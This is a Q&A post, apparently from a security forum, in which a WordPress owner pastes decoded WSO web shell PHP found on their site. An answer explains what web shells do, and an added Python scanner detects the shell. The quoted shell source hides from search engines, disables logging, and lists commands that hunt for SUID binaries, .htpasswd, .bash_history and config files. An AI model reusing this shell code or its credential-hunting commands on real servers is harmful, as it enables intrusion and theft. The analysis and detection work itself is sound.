What does this malicious PHP code found on my WordPress site actually do?

Question

Unfortunately I'm not a PHP programmer and can't fully understand what is going on in the following code.

It was extracted from a PHP file that had been injected into a WordPress directory. After several rounds of base64 decoding and decompression I was able to get this:

<?php ?><?php
/* Reject search engines */
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array('Google','Slurp','MSNBot','ia_archiver','Yandex','Rambler');
    if (preg_match('/' . implode('|',$userAgents) . '/i',$_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
/* Settings */
$color = '#12ff4f';
$default_charset = 'Windows-1251';
//$auth_pass='2ff14d14e063ac36b593e3d437005300ea2f77bb';//memes
/* Shell Setup */
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('allow_url_fopen',true);
@ini_set("allow_url_include",true);
@set_time_limit(0);
/*More Shell Setup*/
if (get_magic_quotes_runtime()) @set_magic_quotes_runtime(0);
if (get_magic_quotes_gpc()) {
    function WSOstripslashes($arr) {
        return is_array($arr) ? array_map('WSOstripslashes',$arr) : stripslashes($arr);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}
function WSOb64decode($arr) {
    return is_array($arr) ? array_map('WSOb64decode',$arr) : base64_decode($arr);
}
function WSOsetcookie($k,$v) {
    $_COOKIE[$k] = $v;
    setcookie($k,$v);
}
if (!empty($auth_pass)) {
    if (isset($_POST['pass']) && (sha1($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']),base64_encode($_POST['pass']));
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || (sha1(base64_decode($_COOKIE[md5($_SERVER['HTTP_HOST']) ])) != $auth_pass)) die('<form method=post>Password: <input type=password name=pass><input type=submit value=">>"></form>');
}
$_POST = WSOb64decode($_POST);
$os = (strtolower(substr(PHP_OS,3)) == 'win') ? 'win' : 'nix';
$safe_mode = @ini_get('safe_mode');
if (!$safe_mode) error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c'])) @chdir($_POST['c']);
$cwd = @getcwd();
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
$aliases = array('List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find suid' => 'find / -type f -perm -04000 -ls', 'find suid in current dir' => 'find . -type f -perm -04000 -ls', 'find sgid' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php' => 'find / -type f -name config.inc.php', 'find config*' => 'find / -type f -name "config*"', 'find config* in current dir' => 'find . -type f -name "config*"', 'find writable folders and files' => 'find / -perm -2 -ls', 'find writable folders and files in current dir' => 'find . -perm -2 -ls', 'find service.pwd' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find .htpasswd' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find .bash_history' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find .fetchmailrc' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc',
    'Locate' => '', 'locate httpd.conf' => 'locate httpd.conf', 'locate vhosts.conf' => 'locate vhosts.conf', 'locate proftpd.conf' => 'locate proftpd.conf', 'locate psybnc.conf' => 'locate psybnc.conf', 'locate my.conf' => 'locate my.conf', 'locate admin.php' => 'locate admin.php', 'locate cfg.php' => 'locate cfg.php', 'locate conf.php' => 'locate conf.php', 'locate config.dat' => 'locate config.dat', 'locate config.php' => 'locate config.php', 'locate config.inc' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php' => 'locate config.default.php', 'locate config*' => 'locate config', 'locate .conf' => 'locate ".conf"', 'locate .pwd' => 'locate ".pwd"', 'locate .sql' => 'locate ".sql"', 'locate .htpasswd' => 'locate ".htpasswd"', 'locate .bash_history' => 'locate ".bash_history"', 'locate .mysql_history' => 'locate ".mysql_history"', 'locate .fetchmailrc' => 'locate ".fetchmailrc"', 'locate backup' => 'locate backup', 'locate dump' => 'locate dump', 'locate priv' => 'locate priv');
/* On Windows, normalise path separators and swap in a Windows alias set */
if ($os == 'win') {
    $home_cwd = str_replace('\\', '/', $home_cwd);
    $cwd = str_replace('\\', '/', $cwd);
    $aliases = array('List Directory' => 'dir', 'Find index.php in current dir' => 'dir /s /w /b index.php', 'Find *config*.php in current dir' => 'dir /s /w /b *config*.php', 'Show active connections' => 'netstat -an', 'Show running services' => 'net start', 'User accounts' => 'net user', 'Show computers' => 'net view', 'ARP Table' => 'arp -a', 'IP Configuration' => 'ipconfig /all');
}
if ($cwd[strlen($cwd) - 1] != '/') $cwd .= '/';
/* Stub out the posix_* helpers when the extension is missing (but not when the admin has disabled them) */
if (!function_exists('posix_getpwuid') && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false)) { function posix_getpwuid($p) { return false; } }
if (!function_exists('posix_getgrgid') && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false)) { function posix_getgrgid($p) { return false; } }

... [full code in pastebin]

Full Code Pastebin

Thanks for your understanding! Thank you.

Answer

The first thing a malicious user does when exploiting a vulnerability is try to land a payload on the target server. Usually that payload includes a backdoor or some other mechanism for executing arbitrary code and commands, such as editing files or uploading more files.

The code you shared is very readable as far as exploits go! Often exploit payloads are encoded or "obfuscated", which makes them almost unreadable and makes it harder for antivirus software to detect their signatures. But you don't need to follow it line by line to see that it sets up an HTML web form and allows certain file and directory commands to be executed. The payload here appears to be a web shell (a common payload), i.e. an HTML-driven application through which the attacker can navigate your file system. It looks like the WSO webshell.

What does an attacker do once they have (web) shell access? That is another question entirely. If an attacker has access to the website, they can change files (for example, modify the login or payment pages so that they collect credentials or have them emailed to themselves), they can execute arbitrary code (for example, turn your web server into a bot recruited for DDoS attacks against other sites), they often try to remove your access to the server (for example, by deleting SSH keys or changing the server login), and they may then extort you for a ransom.

I was once offered $5k/month to hack WordPress sites because (the guy claimed) taking over sites let him collect ad revenue from them. Clearly it is a profitable business.

Depending on how things are set up, they may also be able to impersonate you online, or find ways to get deeper into the network (for example, stealing email or manipulating vote counts). A professional security audit would help determine the risks and exposure to the various kinds of attack.
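The answer identifies the quoted payload as the WSO web shell. The Python script below is an added example and is not part of the original question or answer: it turns the shell's own tells that are visible in the quoted code (the search-engine user-agent block, error logging switched off, allow_url_include turned on, the WSO* helper names, the md5(HTTP_HOST) cookie, base64-decoded POST parameters, chdir from POST, the SUID-hunting alias) into a triage scanner for a WordPress tree, derives the cookie name the shell sets for a given Host header so the access logs can be searched for it, and decodes a captured POST body the way the shell does. The indicator labels, the SAMPLE_SHELL fragment and the request body in the self-test are constructed for this example; a match on two or more indicators is a reason to look at a file, not proof of compromise on its own.

```python
"""Added example (not from the original post): WSO web shell triage helpers."""
from __future__ import annotations

import base64
import hashlib
import os
import re
from urllib.parse import parse_qsl

# Each indicator is a (label, regex) pair modelled on the shell quoted in the
# question. The labels are our own; no single indicator proves compromise.
WSO_INDICATORS = [
    ("search-engine UA block", re.compile(r"Google.*Slurp.*MSNBot", re.S)),
    ("error logging disabled", re.compile(r"ini_set\(\s*['\"]error_log['\"]\s*,\s*NULL")),
    ("allow_url_include enabled", re.compile(r"ini_set\(\s*['\"]allow_url_include['\"]\s*,\s*true", re.I)),
    ("WSO helper names", re.compile(r"WSO(stripslashes|b64decode|setcookie)")),
    ("host-hash cookie", re.compile(r"md5\(\s*\$_SERVER\[\s*['\"]HTTP_HOST['\"]\s*\]\s*\)")),
    ("base64-decoded POST", re.compile(r"\$_POST\s*=\s*\w*b64decode\(\s*\$_POST")),
    ("chdir from POST", re.compile(r"chdir\(\s*\$_POST\[")),
    ("SUID hunting alias", re.compile(r"-perm\s+-0?4000")),
]


def scan_source(src: str) -> list[str]:
    """Return the labels of every indicator found in one PHP source string."""
    return [label for label, rx in WSO_INDICATORS if rx.search(src)]


def scan_tree(root: str, min_hits: int = 2) -> dict[str, list[str]]:
    """Walk a directory and report PHP files that hit at least min_hits indicators."""
    findings: dict[str, list[str]] = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if len(hits) >= min_hits:
                findings[path] = hits
    return findings


def wso_cookie_name(host: str) -> str:
    """Name of the auth cookie the shell sets: md5 of the Host header.

    The shell stores base64(password) under this cookie, so a Set-Cookie or
    Cookie header carrying a 32-hex-char name equal to md5(host) in the web
    logs is a strong sign the shell was used.
    """
    return hashlib.md5(host.encode()).hexdigest()


def decode_wso_post(body: str) -> dict[str, str]:
    """Decode a captured request body the way the shell does.

    The shell runs $_POST through base64_decode() for every value, so the
    captured body only makes sense after the same transformation. Values that
    are not valid base64 are left untouched. Clients percent-encode '+' and
    '=' (%2B, %3D); parse_qsl undoes that before we decode.
    """
    out: dict[str, str] = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        try:
            out[key] = base64.b64decode(value, validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            out[key] = value
    return out


# Constructed sample fragment modelled on the quoted shell, used for a self-test.
SAMPLE_SHELL = r"""<?php
$userAgents = array('Google','Slurp','MSNBot','ia_archiver');
@ini_set('error_log',NULL);
@ini_set("allow_url_include",true);
function WSOb64decode($arr) { return base64_decode($arr); }
$_POST = WSOb64decode($_POST);
if (isset($_POST['c'])) @chdir($_POST['c']);
setcookie(md5($_SERVER['HTTP_HOST']), base64_encode($_POST['pass']));
"""

# Constructed benign file for comparison.
SAMPLE_BENIGN = "<?php\nrequire_once __DIR__ . '/wp-load.php';\n"


if __name__ == "__main__":
    print("sample shell hits:", scan_source(SAMPLE_SHELL))
    print("benign file hits:", scan_source(SAMPLE_BENIGN))
    print("cookie name for example.com:", wso_cookie_name("example.com"))
    # Point scan_tree at a WordPress docroot to sweep it, e.g. scan_tree("/var/www/html")
```

Run `scan_tree("/var/www/html")` (or the site's document root) for a first sweep, then grep the access log for POST requests to any flagged file and for the cookie name returned by `wso_cookie_name` for each vhost; the decoded POST bodies show which directory (`c`) and commands the operator used, which is what an incident timeline needs.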
